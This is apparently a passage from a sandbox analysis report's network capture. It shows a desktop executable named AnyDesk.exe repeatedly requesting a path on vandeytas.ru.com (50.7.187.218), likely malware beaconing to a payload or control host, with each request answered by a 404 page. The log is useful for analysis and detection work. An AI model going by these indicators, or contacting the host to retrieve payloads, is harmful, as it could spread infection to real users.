2024-11-26 07:12:24 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:24 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:24 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49936	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:26 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:26 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:26 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:26 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49943	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:28 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:29 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:28 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:29 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49950	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:30 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:31 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:31 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:31 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49957	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:33 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:33 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:33 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:33 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49964	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:35 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:35 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:35 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:35 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49971	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:37 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:37 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:37 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:37 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	49979	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:39 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:40 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:39 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:40 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	49986	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:41 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:42 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:42 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:42 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	49993	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:43 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:44 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:44 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:44 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	50000	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:46 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:46 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:46 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:46 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	50007	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:48 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:48 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:48 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:48 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	50014	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:50 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:50 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:50 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:50 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	50020	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:52 UTC	165	OUT	GET /233_Hlvzmhuinff HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: vandeytas.ru.com
2024-11-26 07:12:52 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 26 Nov 2024 07:12:52 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-11-26 07:12:52 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	50027	50.7.187.218	443	6084	C:\Users\user\Desktop\AnyDesk.exe

Timestamp	Bytes transferred	Direction	Data
